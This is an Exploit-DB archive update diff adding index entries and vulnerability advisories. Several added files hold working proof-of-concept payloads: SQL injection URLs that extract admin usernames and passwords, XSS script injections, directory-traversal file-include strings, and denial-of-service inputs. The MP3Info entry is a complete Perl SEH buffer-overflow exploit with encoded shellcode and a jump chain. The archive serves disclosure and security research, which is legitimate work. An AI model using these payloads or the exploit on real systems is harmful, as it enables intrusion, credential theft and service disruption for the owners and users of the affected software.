Updated 03_20_2014

files.csv

@@ -29103,7 +29103,7 @@ id,file,description,date,author,platform,type,port
 32327,platforms/php/webapps/32327.txt,"XRMS 1.99.2 reports/custom/mileage.php starting Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
 32329,platforms/windows/dos/32329.rb,"Gold MP4 Player 3.3 - Universal SEH Exploit (MSF)",2014-03-17,"Revin Hadi Saputra",windows,dos,0
 32330,platforms/php/webapps/32330.txt,"OpenSupports 2.0 - Blind SQL Injection",2014-03-17,indoushka,php,webapps,0
-32331,platforms/php/webapps/32331.txt,"Joomla AJAX Shoutbox <= 1.6 - Remote SQL Injection Vulnerability",2014-03-17,"Pen Ten",php,webapps,0
+32331,platforms/php/webapps/32331.txt,"Joomla AJAX Shoutbox <= 1.6 - Remote SQL Injection Vulnerability",2014-03-17,"Ibrahim Raafat",php,webapps,0
 32332,platforms/windows/dos/32332.txt,"Free Download Manager - Stack-based Buffer Overflow",2014-03-17,"Julien Ahrens",windows,dos,80
 32333,platforms/hardware/dos/32333.txt,"iOS 7 - Kernel Mode Memory Corruption",2014-03-17,"Andy Davis",hardware,dos,0
 32334,platforms/php/webapps/32334.txt,"Celerondude Uploader 6.1 'account.php' Cross-Site Scripting Vulnerability",2008-09-03,Xc0re,php,webapps,0
@@ -29111,9 +29111,27 @@ id,file,description,date,author,platform,type,port
 32336,platforms/hardware/remote/32336.txt,"D-Link DIR-100 1.12 Security Bypass Vulnerability",2008-09-08,"Marc Ruef",hardware,remote,0
 32337,platforms/php/webapps/32337.txt,"Silentum LoginSys 1.0 Multiple Cross-Site Scripting Vulnerabilities",2008-09-06,"Maximiliano Soler",php,webapps,0
 32338,platforms/php/webapps/32338.txt,"phpAdultSite CMS 'results_per_page' Parameter Cross-Site Scripting Vulnerability",2008-09-07,"David Sopas",php,webapps,0
+32339,platforms/windows/remote/32339.txt,"Microsoft Organization Chart 2 - Remote Code Execution Vulnerability",2008-09-08,"Ivan Sanchez",windows,remote,0
 32340,platforms/php/webapps/32340.txt,"Gallery 2.0 Multiple Cross Site Scripting Vulnerabilities",2008-09-08,sl4xUz,php,webapps,0
 32341,platforms/hardware/dos/32341.html,"Apple iPhone 1.1.4/2.0 and iPod 1.1.4/2.0 touch Safari WebKit 'alert()' Function Remote Denial of Service Vulnerability",2008-09-12,"Nicolas Economou",hardware,dos,0
 32342,platforms/php/webapps/32342.txt,"eXtrovert software Thyme 1.3 'pick_users.php' SQL Injection Vulnerability",2008-09-08,"Omer Singer",php,webapps,0
 32343,platforms/php/local/32343.php,"PHP 5.2.5 Multiple Functions 'safe_mode_exec_dir' and 'open_basedir' Restriction Bypass Vulnerabilities",2008-09-08,Ciph3r,php,local,0
 32344,platforms/windows/remote/32344.txt,"Microsoft Windows Image Acquisition Logger ActiveX Control Arbitrary File Overwrite Vulnerability (1)",2008-09-08,Ciph3r,windows,remote,0
 32345,platforms/windows/remote/32345.cpp,"Microsoft Windows Image Acquisition Logger ActiveX Control Arbitrary File Overwrite Vulnerability (2)",2008-09-08,Ciph3r,windows,remote,0
+32346,platforms/php/webapps/32346.txt,"E-Php B2B Trading Marketplace Script 'listings.php' SQL Injection Vulnerability",2008-09-07,r45c4l,php,webapps,0
+32347,platforms/php/webapps/32347.txt,"UBB.threads 7.3.1 'Forum[]' Array SQL Injection Vulnerability",2008-09-02,"James Bercegay",php,webapps,0
+32348,platforms/linux/dos/32348.txt,"MySQL <= 6.0.4 Empty Binary String Literal Remote Denial Of Service Vulnerability",2008-03-28,"Kay Roepke",linux,dos,0
+32349,platforms/php/webapps/32349.txt,"PunBB 1.2.x 'p' Parameter Multiple Cross-Site Scripting Vulnerabilities",2008-08-20,"Henry Sudhof",php,webapps,0
+32350,platforms/windows/dos/32350.txt,"Apple Bonjour for Windows 1.0.4 mDNSResponder NULL Pointer Dereference Denial of Service Vulnerability",2008-09-09,"Mario Ballano Bárcena",windows,dos,0
+32351,platforms/php/webapps/32351.txt,"Jaw Portal 1.2 'index.php' Multiple Local File Include Vulnerabilities",2008-09-10,SirGod,php,webapps,0
+32352,platforms/php/webapps/32352.txt,"AvailScript Job Portal Script 'applynow.php' SQL Injection Vulnerability",2008-09-10,InjEctOr5,php,webapps,0
+32353,platforms/php/webapps/32353.txt,"Horde Application Framework <= 3.2.1 Forward Slash Insufficient Filtering Cross-Site Scripting Vulnerability",2008-09-10,"Alexios Fakos",php,webapps,0
+32354,platforms/php/webapps/32354.txt,"Horde 3.2 MIME Attachment Filename Insufficient Filtering Cross-Site Scripting Vulnerability",2008-09-10,"Alexios Fakos",php,webapps,0
+32355,platforms/php/webapps/32355.txt,"Hot Links SQL-PHP 'news.php' SQL Injection Vulnerability",2008-09-10,r45c4l,php,webapps,0
+32356,platforms/windows/dos/32356.txt,"ZoneAlarm Security Suite 7.0 AntiVirus Directory Path Buffer Overflow Vulnerability",2008-09-11,"Juan Pablo Lopez Yacubian",windows,dos,0
+32358,platforms/windows/local/32358.pl,"MP3Info 0.8.5a - SEH Buffer Overflow Exploit",2014-03-19,"Ayman Sagy",windows,local,0
+32360,platforms/php/webapps/32360.txt,"NooMS 1.1 smileys.php page_id Parameter XSS",2008-09-11,Dr.Crash,php,webapps,0
+32361,platforms/php/webapps/32361.txt,"NooMS 1.1 search.php q Parameter XSS",2008-09-11,Dr.Crash,php,webapps,0
+32364,platforms/php/webapps/32364.txt,"Dynamic MP3 Lister 2.0.1 'index.php' Multiple Cross Site Scripting Vulnerabilities",2008-09-12,Xylitol,php,webapps,0
+32365,platforms/php/webapps/32365.txt,"Paranews 3.4 Multiple Cross Site Scripting Vulnerabilities",2008-09-12,Xylitol,php,webapps,0
+32366,platforms/php/webapps/32366.txt,"QuicO 'photo.php' SQL Injection Vulnerability",2008-09-12,"Beenu Arora",php,webapps,0

platforms/linux/dos/32348.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/31081/info
+
+MySQL is prone to a remote denial-of-service vulnerability because it fails to handle empty binary string literals.
+
+An attacker can exploit this issue to crash the application, denying access to legitimate users.
+
+This issue affects versions prior to MySQL 5.0.66, 5.1.26, and 6.0.6. 
+
+The following proof-of-concept query is available:
+
+select b''; 

platforms/php/webapps/32346.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/31072/info
+
+E-Php B2B Trading Marketplace Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/listings.php?browse=product&cid=-1+union+all+select+1,concat(version(),char(58),database(),char(58),user()),3,4,5,6,7,8-- 

platforms/php/webapps/32347.txt

@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/31074/info
+
+UBB.threads is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+The issue affects UBB.threads 7.3.1 (released before September 2, 2008) and prior versions.
+
+ubb=dosearch
+&fromsearch=1
+&Words=test
+&Forum[]=f-99')) UNION SELECT '1
+&Forum[]=f' %2b MID('' %2b USER_PASSWORD %2b '
+&Forum[]=f1
+&Forum[]=f1') %2b '
+&Forum[]=f1
+&Forum[]=f1' FROM ubbt_USERS/*
+
+

platforms/php/webapps/32349.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31082/info
+
+PunBB is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Versions prior to PunBB 1.2.20 are vulnerable.
+
+http://www.example.com/userlist.php?p=2<script>alert('meh');</script> 

platforms/php/webapps/32351.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/31099/info
+
+Jaw Portal is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit these vulnerabilities using directory-traversal strings to execute arbitrary local PHP scripts within the context of the webserver process.
+
+Jaw Portal 1.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?flag=../../../autoexec.bat%00
+http://www.example.com/index.php?inc=../../../autoexec.bat%00 

platforms/php/webapps/32352.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/31101/info
+
+AvailScript Job Portal Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/job_seeker/applynow.php?jid=-99999+union+select+0,01,concat(username,0x3a,password),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+admin-- 

platforms/php/webapps/32353.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/31107/info
+
+Horde Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+This issue affects versions prior to Horde Framework 3.1.9 and 3.2.2.
+
+Note that additional products that use the Horde Framework may also be vulnerable.
+
+<body/onload=alert(/hello/)> 

platforms/php/webapps/32354.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/31110/info
+
+Horde Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+This issue affects Horde Framework 3.2 through 3.2.1.
+
+Note that additional products that use the Horde Framework may also be vulnerable.
+
+<body/onload=alert(/hello/)> 

platforms/php/webapps/32355.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31118/info
+
+Hot Links SQL-PHP is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Hot Links SQL-PHP 3 and prior versions are vulnerable. 
+
+http://www.example.com/news.php?id=-1+union+all+select+1,concat(version(),0x3a,database(),0x3a,user()),null,null-- 

platforms/php/webapps/32360.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31131/info
+
+NooMS is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+NooMS 1.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/smileys.php?page_id=<script>alert('xss')</script>

platforms/php/webapps/32361.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31131/info
+ 
+NooMS is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+ 
+NooMS 1.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/search.php?q="<script>alert('xss')</script> 

platforms/php/webapps/32364.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/31151/info
+
+Dynamic MP3 Lister is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Dynamic MP3 Lister 2.0.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?currentpath=[XSS]&sort=[XSS]&invert=[XSS]
+http://www.example.com/index.php?sort=[XSS]&invert=[XSS]&currentpath=[XSS]&search=[XSS] 

platforms/php/webapps/32365.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31152/info
+
+Paranews is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Paranews 3.4 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/news.php?pn_go=details&page=[XSS]&id=[XSS] 

platforms/php/webapps/32366.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/31154/info
+
+QuicO is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/gallery/photo.php?id=48+and+1=2+union+select+1,version(),user(),database(),0x6461726b633064652052756c65732e2e2121,6-- 

platforms/windows/dos/32350.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31091/info
+
+Apple Bonjour for Windows is prone to a denial-of-service issue because of a NULL-pointer dereference.
+
+Successfully exploiting this issue will allow attackers to crash the mDNSResponder system service, denying service to legitimate users.
+
+Bonjour for Windows 1.0.4 is vulnerable. 
+
+http://diechromedie.1234567890123456789012345678901234567890123456789012345678901234.local/ 

platforms/windows/dos/32356.txt

@@ -0,0 +1,20 @@
+source: http://www.securityfocus.com/bid/31124/info
+
+ZoneAlarm Security Suite is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input when performing virus scans on long directory paths.
+
+Remote attackers may leverage this issue to execute arbitrary code with SYSTEM-level privileges and gain complete access to the vulnerable computer. Failed attacks will cause denial-of-service conditions.
+
+This issue affects ZoneAlarm Security Suite 7.0.483.000; other versions may also be affected. 
+
+To demonstrate this issue, construct multiple nested subdirectories, naming the root directory string1 below, and each nested directory string2:
+
+string1:
+ASCII: ? ? AAAAAAAAAAAAAAAAAAA ? ? AAAAAAAAAAAAAAAAAAA ? ? AAAAAAAAAAAAAAAAAAA ? ? ? AAAAAAAAAAAAAAAAAAA ? ? AAAAAAAAAAAAAAAAAAA ? ? AAAAAAAAAAAAAAAAAAA ? ? ? A ? ? AAAAAAAAAAAAAAAAAAA ? ? AAAAAAAAAAAAAAAAAAA
+
+HEX : b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 b7 20 85 20 20 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
+
+string2:
+ASCII: ???????????AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA????AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+
+HEX: 85 85 85 85 85 85 85 85 85 85 85 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 85 85 85 85 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
+

platforms/windows/local/32358.pl

@@ -0,0 +1,61 @@
+# Exploit Title: mp3info SEH exploit
+# Date: 18 March 2014
+# Exploit Author: Ayman Sagy <aymansagy [at] gmail.com>
+# Vendor Homepage: http://ibiblio.org/mp3info/
+# Software Link: http://www.exploit-db.com/wp-content/themes/exploit/applications/cb7b619a10a40aaac2113b87bb2b2ea2-mp3info-0.8.5a.tgz
+# Version: MP3Info 0.8.5
+# Tested on: Windows 7 Ultimate 64 and 32 bit
+# CVE : 2006-2465
+# Original POC: http://www.exploit-db.com/exploits/31220/
+#
+# The process memory region starts with a null byte but exploitation is still possible because of 
+# the little endian architecture provided that the return address gets placed at the end of the buffer,
+# this however confines us in the tiny 4-byte area after pop/pop/retn
+# Using a couple of trampolines I jumped back to the beginning of the buffer which is 533 bytes, enough to fit a calc payload
+#
+# run in the same directory of MP3Info, the exploit will launch mp3info with the payload as argument: perl mp3infosploit.pl
+
+
+
+# mangled chars: F4->34 F3->33
+# msfpayload windows/exec cmd=calc R | msfencode -b '\x00\0d\0a\x09' -t perl
+$shellcode = 
+"\xdb\xd4\xba\x2b\xc5\x7d\xb7\xd9\x74\x24\xf4\x58\x29\xc9" .
+"\xb1\x32\x31\x50\x17\x83\xe8\xfc\x03\x7b\xd6\x9f\x42\x87" .
+"\x30\xd6\xad\x77\xc1\x89\x24\x92\xf0\x9b\x53\xd7\xa1\x2b" .
+"\x17\xb5\x49\xc7\x75\x2d\xd9\xa5\x51\x42\x6a\x03\x84\x6d" .
+"\x6b\xa5\x08\x21\xaf\xa7\xf4\x3b\xfc\x07\xc4\xf4\xf1\x46" .
+"\x01\xe8\xfa\x1b\xda\x67\xa8\x8b\x6f\x35\x71\xad\xbf\x32" .
+"\xc9\xd5\xba\x84\xbe\x6f\xc4\xd4\x6f\xfb\x8e\xcc\x04\xa3" .
+"\x2e\xed\xc9\xb7\x13\xa4\x66\x03\xe7\x37\xaf\x5d\x08\x06" .
+"\x8f\x32\x37\xa7\x02\x4a\x7f\x0f\xfd\x39\x8b\x6c\x80\x39" .
+"\x48\x0f\x5e\xcf\x4d\xb7\x15\x77\xb6\x46\xf9\xee\x3d\x44" .
+"\xb6\x65\x19\x48\x49\xa9\x11\x74\xc2\x4c\xf6\xfd\x90\x6a" .
+"\xd2\xa6\x43\x12\x43\x02\x25\x2b\x93\xea\x9a\x89\xdf\x18" .
+"\xce\xa8\xbd\x76\x11\x38\xb8\x3f\x11\x42\xc3\x6f\x7a\x73" .
+"\x48\xe0\xfd\x8c\x9b\x45\xf1\xc6\x86\xef\x9a\x8e\x52\xb2" .
+"\xc6\x30\x89\xf0\xfe\xb2\x38\x88\x04\xaa\x48\x8d\x41\x6c" .
+"\xa0\xff\xda\x19\xc6\xac\xdb\x0b\xa5\x33\x48\xd7\x2a";
+
+
+$exploit = "\x90"x156 . $shellcode;
+$exploit .= "\x41"x142;
+
+									
+$exploit .= 							# larger jump to beginning of buffer
+			"\x58\x58\x58".				# 58 POP EAX x 3
+			"\x80\xc4\x02".				# 80C4 02          ADD AH,2
+			"\xFF\xE0";					# FFE0             JMP EAX	 
+
+
+$exploit .= "\xEB\xEF\x90\x90"; # short jmp back to get some space
+
+
+#print length($exploit);
+#exit(0);
+print "\n";
+$seh = "\x46\x34\x40"; # 0x00403446  mp3info.exe             POP EBX 
+
+$exploit = $exploit . $seh;
+
+system("mp3info.exe", $exploit);

platforms/windows/remote/32339.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/31059/info
+
+Microsoft Organization Chart is prone to a remote code-execution vulnerability because of a memory-access violation.
+
+Remote attackers can exploit this issue by enticing victims into opening a maliciously crafted Organization Chart document.
+
+Successful exploits may allow attackers to execute arbitrary code within the context of the affected application. Failed exploit attempts will likely result in a denial of service.
+
+Microsoft Organization Chart 2.00,19 is vulnerable; other versions may also be affected. 
+
+http://www.exploit-db.com/sploits/32339.rar